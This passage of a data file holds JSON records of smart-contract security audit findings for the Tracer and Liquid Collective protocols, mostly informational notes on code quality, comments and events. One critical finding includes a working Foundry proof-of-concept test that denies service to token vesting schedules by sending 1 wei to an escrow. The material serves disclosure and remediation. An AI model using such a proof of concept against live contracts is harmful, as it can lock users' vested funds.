require(initialization._keeper != address(0), \"Keeper cannot be 0 address\"); LeveragedPool.sol: require(initialization._longToken != address(0), \"Long token cannot be 0 address\"); LeveragedPool.sol: require(initialization._shortToken != address(0), \"Short token cannot be 0 address\"); LeveragedPool.sol: require(initialization._poolCommitter != address(0), \"PoolCommitter cannot be 0 address\"); LeveragedPool.sol: require(initialization._invariantCheckContract != address(0), \"InvariantCheck cannot be 0 address\"); LeveragedPool.sol: require(initialization._fee < PoolSwapLibrary.WAD_PRECISION, \"Fee >= 100%\"); LeveragedPool.sol: require(initialization._secondaryFeeSplitPercent <= 100, \"Secondary fee split cannot exceed 100%\"); LeveragedPool.sol: require(initialization._updateInterval != 0, \"Update interval cannot be 0\"); LeveragedPool.sol: require(intervalPassed(), \"Update interval hasn't passed\"); LeveragedPool.sol: require(account != address(0), \"Account cannot be 0 address\"); LeveragedPool.sol: require(msg.sender == _oldSecondaryFeeAddress); LeveragedPool.sol: require(_keeper != address(0), \"Keeper address cannot be 0 address\"); LeveragedPool.sol: require(_governance != governance, \"New governance address cannot be same as old governance address\"); LeveragedPool.sol: require(_governance != address(0), \"Governance address cannot be 0 address\"); LeveragedPool.sol: require(governanceTransferInProgress, \"No governance change active\"); LeveragedPool.sol: require(msg.sender == _provisionalGovernance, \"Not provisional governor\"); LeveragedPool.sol: require(paused, \"Pool is live\"); PoolCommitter.sol: require(!paused, \"Pool is paused\"); (multiple occurrences) PoolCommitter.sol: require(msg.sender == governance, \"msg.sender not governance\"); PoolCommitter.sol: require(msg.sender == invariantCheckContract, \"msg.sender not invariantCheckContract\"); PoolCommitter.sol: require(msg.sender == factory, \"Committer: not factory\"); PoolCommitter.sol: require(msg.sender == leveragedPool, \"msg.sender not leveragedPool\"); PoolCommitter.sol: require(msg.sender == user || msg.sender == address(autoClaim), \"msg.sender not committer or AutoClaim\"); PoolCommitter.sol: require(_factory != address(0), \"Factory address cannot be 0 address\"); PoolCommitter.sol: require(_invariantCheckContract != address(0), \"InvariantCheck address cannot be 0 address\"); PoolCommitter.sol: require(_autoClaim != address(0), \"AutoClaim address cannot be null\"); PoolCommitter.sol: require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); PoolCommitter.sol: require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); PoolCommitter.sol: require(userCommit.balanceLongBurnAmount <= balance.longTokens, \"Insufficient pool tokens\"); PoolCommitter.sol: require(userCommit.balanceShortBurnAmount <= balance.shortTokens, \"Insufficient pool tokens\"); PoolCommitter.sol: require(userCommit.balanceLongBurnMintAmount <= balance.longTokens, \"Insufficient pool tokens\"); PoolCommitter.sol: require(userCommit.balanceShortBurnMintAmount <= balance.shortTokens, \"Insufficient pool tokens\"); PoolCommitter.sol: require(amount > 0, \"Amount must not be zero\"); PoolCommitter.sol: require(_quoteToken != address(0), \"Quote token address cannot be 0 address\"); PoolCommitter.sol: require(_leveragedPool != address(0), \"Leveraged pool address cannot be 0 address\"); PoolFactory.sol: require(_feeReceiver != address(0), \"Address cannot be null\"); PoolFactory.sol: require(_poolKeeper != address(0), \"PoolKeeper not set\"); PoolFactory.sol: require(autoClaim != address(0), \"AutoClaim not set\"); PoolFactory.sol: require(invariantCheck != address(0), \"InvariantCheck not set\"); PoolFactory.sol: require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\"); PoolFactory.sol: require(deploymentParameters.leverageAmount >= 1 && deploymentParameters.leverageAmount <= maxLeverage, \"PoolKeeper: leveraged amount invalid\"); PoolFactory.sol: require(IERC20DecimalsWrapper(deploymentParameters.quoteToken).decimals() <= MAX_DECIMALS, \"Decimal precision too high\"); PoolFactory.sol: require(_poolKeeper != address(0), \"address cannot be null\"); PoolFactory.sol: require(_invariantCheck != address(0), \"address cannot be null\"); PoolFactory.sol: require(_autoClaim != address(0), \"address cannot be null\"); PoolFactory.sol: require(newMaxLeverage > 0, \"Maximum leverage must be non-zero\"); PoolFactory.sol: require(_feeReceiver != address(0), \"address cannot be null\"); PoolFactory.sol: require(newFeePercent <= 100, \"Secondary fee split cannot exceed 100%\"); PoolFactory.sol: require(_fee <= 0.1e18, \"Fee cannot be > 10%\"); PoolFactory.sol: require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); PoolFactory.sol: require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); PoolFactory.sol: require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); PoolKeeper.sol: require(msg.sender == address(factory), \"Caller not factory\"); PoolKeeper.sol: require(_factory != address(0), \"Factory cannot be 0 address\"); PoolKeeper.sol: require(_observer != address(0), \"Price observer cannot be 0 address\"); PoolKeeper.sol: require(firstPrice > 0, \"First price is non-positive\"); PoolKeeper.sol: require(observer != address(0), \"Observer not initialized\"); PoolSwapLibrary.sol: require(timestamp >= lastPriceTimestamp, \"timestamp in the past\"); PoolSwapLibrary.sol: require(price != 0, \"price == 0\"); (three occurrences) PriceObserver.sol: require(msg.sender == writer, \"PO: Permission denied\"); PriceObserver.sol: require(i < length(), \"PO: Out of bounds\"); PriceObserver.sol: require(_writer != address(0), \"PO: Null address not allowed\"); SMAOracle.sol: require(_spotOracle != address(0) && _observer != address(0) && _deployer != address(0), \"SMA: Null address forbidden\"); SMAOracle.sol: require(_periods > 0 && _periods <= IPriceObserver(_observer).capacity(), \"SMA: Out of bounds\"); SMAOracle.sol: require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); SMAOracle.sol: require(_updateInterval != 0, \"Update interval cannot be 0\"); SMAOracle.sol: require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to update\"); SMAOracle.sol: require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of bounds\");", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Different updateIntervals in SMAOracle and pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateIntervals for the pools and the SMAOracles are different. If the updateInterval for the SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep(), an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it can't be called again until updateInterval has passed. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ... updateInterval = initialization._updateInterval; ... } function poolUpkeep(... ) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); ... } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } contract SMAOracle is IOracleWrapper { constructor(..., uint256 _updateInterval, ... ) { updateInterval = _updateInterval; } function poll() external override returns (int256) { require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to update\"); return update(); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Tight coupling between LeveragedPool and PoolCommitter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The LeveragedPool and PoolCommitter contracts call each other back and forth. This could be optimized to make the code clearer and perhaps save some gas. Here is an example: contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function poolUpkeep(...) external override onlyKeeper { ... IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); ... } } contract PoolCommitter is IPoolCommitter, Initializable { function executeCommitments(...) external override onlyPool { ... uint256 lastPriceTimestamp = pool.lastPriceTimestamp(); // call to first contract uint256 updateInterval = pool.updateInterval(); // call to first contract ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Code in SMA() is hard to read", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The SMA() function checks for k being smaller or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded. Note: This issue was also mentioned in the Runtime Verification report: B15 PriceObserver - avoid magic values function SMA( int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of bounds\"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ...
}", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Code is chain-dependant due to fixed block time and no support for EIP-1559", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesnt use block.basefee. On Ethereum Mainnet the blocktime will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains. contract PoolKeeper is IPoolKeeper, Ownable { ... uint256 public constant BLOCK_TIME = 13; /* in seconds */ ... /// Captures fixed gas overhead for performing upkeep that's unreachable /// by `gasleft()` due to our approach to error handling in that code uint256 public constant FIXED_GAS_OVERHEAD = 80195; ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "ABDKQuad-related constants defined outside PoolSwapLibrary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library its less error prone to have any ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase. contract PoolCommitter is IPoolCommitter, Initializable { bytes16 public constant one = 0x3fff0000000000000000000000000000; ... // Set max minting fee to 100%. This is a ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Lack of a state to allow withdrawal of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Immediately after the invariants dont hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions cant happen anymore to indicate withdrawal intention. Note: the comment in withdrawQuote() is incorrect. Pool must be paused. /** ... * @dev Pool must not be paused // comment not accurate ... */ ... function withdrawQuote() external onlyGov { require(paused, \"Pool is live\"); IERC20 quoteERC = IERC20(quoteToken); uint256 balance = quoteERC.balanceOf(address(this)); IERC20(quoteToken).safeTransfer(msg.sender, balance); emit QuoteWithdrawn(msg.sender, balance); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Undocumented frontrunning protection", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "PoolFactory deployPool() per(deploymentParameters.oracleWrapper).deployer() == msg.sender frontrunning the deployment transaction of the pool. 
frontrunning the deployment transaction of the pool. This is because the poolCommitter, LeveragedPool and pair token instances are deployed at a deterministic address, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because of the different msg.sender address, which causes the deployer() check to fail. Alternatively, the attacker would have to use a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require( IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\" ); ... bytes32 uniquePoolHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper ) ); PoolCommitter poolCommitter = PoolCommitter( Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash) ); ... LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash)); ... } function deployPairToken(... ) internal returns (address) { ... bytes32 uniqueTokenHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper, direction ) ); PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, uniqueTokenHash)); ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "No event exists for users self-claiming commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim() which does emit the PaidRequestExecution event.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Mixups of types and scaling factors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used: uint (no scaling), uint (WAD scaling), ABDKMathQuad, ABDKMathQuad (WAD scaling). Solidity >0.8.9's user-defined value types could be used to prevent mistakes. This will require several typecasts, but they don't add extra gas costs.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Terminology used for tokens and oracles is not clear and consistent across codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Different terms are used across the codebase to address the different tokens, leading to some mixups.
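For the frontrunning-protection finding above, a minimal sketch of how the deterministic clone address can be precomputed off the factory's salt, using OpenZeppelin's Clones library that the factory already relies on; the parameter types here (notably leverageAmount's) are assumptions and must match the factory's actual struct types for the hash to agree.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/proxy/Clones.sol";

    // Sketch: the pool address is a pure function of (leverageAmount, quoteToken,
    // oracleWrapper) plus the factory address, so a frontrunner with a different
    // oracleWrapper (or failing the deployer() check) can never occupy it.
    contract PoolAddressSketch {
        function predictedPool(
            address factory,
            address poolBase,
            uint256 leverageAmount, // type assumed for illustration
            address quoteToken,
            address oracleWrapper
        ) external pure returns (address) {
            bytes32 uniquePoolHash = keccak256(
                abi.encode(leverageAmount, quoteToken, oracleWrapper)
            );
            return Clones.predictDeterministicAddress(poolBase, uniquePoolHash, factory);
        }
    }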
Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply: collateral token == quote token == settlement token == WETH; pool token == long token + short token == long BTC/USDC + short BTC/USDC. As for the oracles: settlementEthOracle is the oracle for settlement in ETH (WETH/ETH); oracleWrapper is the oracle for BTC/USDC. Here is an example of a mixup: The comments in getMint() and getBurn() are different while their result should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens. * @notice Calculates the number of pool tokens to mint, given some settlement token amount and a price ... * @return Quantity of pool tokens to mint ... function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... } * @notice Calculate the number of settlement tokens to burn, based on a price and an amount of pool tokens // settlement & pool seem reversed ... * @return Quantity of pool tokens to burn ... function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... } The settlementTokenPrice variable in keeperGas() is misleading, as it is not clear whether it is ETH per settlement token or settlement tokens per ETH. contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Incorrect NatSpec and comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Some NatSpec documentation and comments contain incorrect or unclear information. In PoolSwapLibrary.sol#L283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncommitment, which is no longer supported. * @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts, which is allowed for uncommitment. function isBeforeFrontRunningInterval(...) In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused while the require checks that it is paused. * @dev Pool must not be paused function withdrawQuote() ... { require(paused, \"Pool is live\"); In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays. // The most recent update interval in which a user committed mapping(address => uint256[]) public unAggregatedCommitments; In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong. The order of the @param lines should be switched, @param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint, and @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to. /** * @notice Mints pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens to + * @param account Account to mint pool tokens to + * @param amount Pool tokens to mint */ function mint(address account, uint256 amount) external override onlyOwner { ... } In PoolToken.sol#L25-L32 the order of the @param lines is reversed.
/** * @notice Burns pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens from + * @param account Account to burn pool tokens from + * @param amount Pool tokens to burn */ function burn(address account, uint256 amount) external override onlyOwner { ... } In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It would also be suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool. /** * @notice Deploy a contract for pool tokens + * @param pool The pool address, owner of the Pool Token * @param leverage Amount of leverage for pool * @param deploymentParameters Deployment parameters for parent function * @param direction Long or short token, L- or S- * @return Address of the pool token */ function deployPairToken( - address poolOwner, + address pool, string memory leverage, PoolDeployment memory deploymentParameters, string memory direction ) internal returns (address) { ... - pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); + pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); ... } In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed. * @param amount ... * @param oppositePrice ... ... function getMintWithBurns( ... bytes16 oppositePrice, uint256 amount, ... ) public pure returns (uint256) { ... In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of the ERC20_Cloneable contract mentions a default value of 18 for decimals. However, it doesn't use this default value, but the supplied parameter. Moreover, a comment at the constructor of the ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts, and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function. * @dev Sets the values for {name} and {symbol}, initializes {decimals} with a default value of 18. * To select a different value for {decimals}, use {_setupDecimals}. * All three of these values are immutable: they can only be set once during construction. ... constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) { _decimals = decimals_; } function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_) external initializer { owner = _pool; _name = name_; _symbol = symbol_; _decimals = decimals_; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unsolicited exits can happen at the end of _setStoppedValidatorCounts(...)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unsolicited exits can happen at the end of _setStoppedValidatorCounts(...) to avoid extra operations like taking the minimum per iteration of the loops.
Note that: $a_n = a_{n-1} - \min(a_{n-1}, b_n) \implies a_n = a_0 - \min\left(a_0, \sum_{i=1}^{n} b_i\right) = \max\left(0, a_0 - \sum_{i=1}^{n} b_i\right)$", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "use _setCurrentValidatorExitsDemand", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "If an update is needed for CurrentValidatorExitsDemand in _setStoppedValidatorCounts(...), the internal function _setCurrentValidatorExitsDemand is not used.", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "Changes to the emission of RequestedValidatorExits event during catch-up", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "The event log will be different between the old and new implementations. In the old implementation, the latest RequestedValidatorExits event in the logs will always contain the most up-to-date count of requested exits (count) of an operator after a \"catch-up\" attempt. This is because a new RequestedValidatorExits event with the up-to-date currentStoppedCount is emitted at the end of the async requestValidatorExits function call. However, in the new implementation, the latest RequestedValidatorExits event in the logs contains the outdated or previous count of an operator after a \"catch-up\" attempt since a new RequestedValidatorExits event is not emitted at the end of the Oracle reporting transaction. If any off-chain component depends on the latest RequestedValidatorExits event in the logs to determine the count of requested exits (count), it might potentially cause the off-chain component to read and process outdated information. For instance, an operator's off-chain component might be reading the count within the latest RequestedValidatorExits event in the logs and comparing it against its internal counter to decide if more validators need to be exited. The following shows the discrepancy between the events emitted between the old and new implementations. Catch-up implementation in the previous design 1) Catch-up was carried out async when someone called the requestValidatorExits > _pickNextValidatorsToExitFromActiveOperators function 2) Within the _pickNextValidatorsToExitFromActiveOperators function, assume an operator called opera whose currentRequestedExits is less than the currentStoppedCount. It will attempt to \"catch-up\" by performing the following actions: 1) Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2) Let x be the no. of validator count to \"catch-up\" (x = currentStoppedCount - currentRequestedExits) 3) opera.picked will be incremented by x. Since opera.picked has not been initialized yet, opera.picked = x 3) Assume that opera is neither the operator with the highest validation count nor the operator with the second highest. As such, opera is not \"picked\" to exit its validators 4) Near the end of the _pickNextValidatorsToExitFromActiveOperators function, it will loop through all operators that have operator.picked > 0 and perform some actions. The following actions will be performed against opera since opera.picked > 0: 1) Emit RequestedValidatorExits(opera, currentStoppedCount) event 2) Set opera.requestedExits = currentStoppedCount.
5) After the transaction, two events were emitted for opera to indicate a catch-up had been attempted. UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) RequestedValidatorExits(opera, currentStoppedCount) Catch-up implementation in the new design 1. Catch-up was carried out within the _setStoppedValidatorCounts function during Oracle reporting. 2. Let _stoppedValidatorCounts[idx] be the currentStoppedCount AND operators.requestedExits be currentRequestedExits 3. Assume an operator called opera and its currentRequestedExits is less than the currentStoppedCount. It will attempt to \"catch-up\" by performing the following actions: 1. Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2. Set opera.requestedExits = currentStoppedCount. 4. After the transaction, only one event was emitted for opera to indicate a catch-up had been attempted. UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) In addition, as per the comment below, it was understood that unsolicited exits are considered as if exit requests were performed for them. In this case, the latest RequestedValidatorExits event in the logs should reflect the most up-to-date count of exit requests for an operator including unsolicited exits at any time. File: OperatorsRegistry.1.sol 573: // we decrease the demand, considering unsollicited exits as if the exit requests were performed for them 574: vars.currentValidatorExitsDemand -= LibUint256.min(unsollicitedExits, vars.currentValidatorExitsDemand);", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: The creator of the vesting schedule will not be able to revoke the vesting schedule. The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. Any external contracts or dApps will not be able to call computeVestingReleasableAmount. In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an underflow error when called before the vesting schedule ends. The underflow error is thrown because, when called before the schedule ends, _computeVestingReleasableAmount will enter the if (_time < _vestingSchedule.end) branch and will try to compute uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error. When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) branch and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token.
2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the vesting schedule escrow account of the Alice vesting schedule. 8 4) After the cliff period, Alice should be able to release 1 TLC token. Because now balanceOf(_escrow) is 11 it will underflow as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10. Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice 9 vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert for UNDERFLOW because now the balance of the escrow has been ,! 
increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp at the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decide to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice 10 vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount, 11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } 11 }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Critical Risk" + ] + }, + { + "title": "Coverage funds might be pulled not only for the purpose of covering slashing losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable In practice, however, it is possible that these funds will be pulled not only in emergency events. 
